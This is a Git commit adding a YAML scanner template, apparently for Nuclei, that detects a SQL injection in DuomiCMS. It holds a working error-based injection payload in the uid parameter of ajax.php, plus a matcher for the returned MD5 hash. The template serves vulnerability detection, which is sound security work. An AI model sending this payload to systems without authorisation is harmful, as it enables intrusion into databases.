Merge pull request #970 from pikpikcu/patch-91

Create duomicms-sql-injection
patch-1
PD-Team 2021-02-27 14:10:27 +05:30 committed by GitHub
commit 88a34af65e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: duomicms-sql-injection
info:
name: DuomiCMS SQL Injection
author: pikpikcu
severity: high
refrence: https://redn3ck.github.io/2016/11/01/duomiCMS/
tags: duomicms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
matchers-condition: and
matchers:
- type: word
words:
- "e0ec043b3f9e198ec09041687e4d4e8d"
part: body
condition: and
- type: status
status:
- 200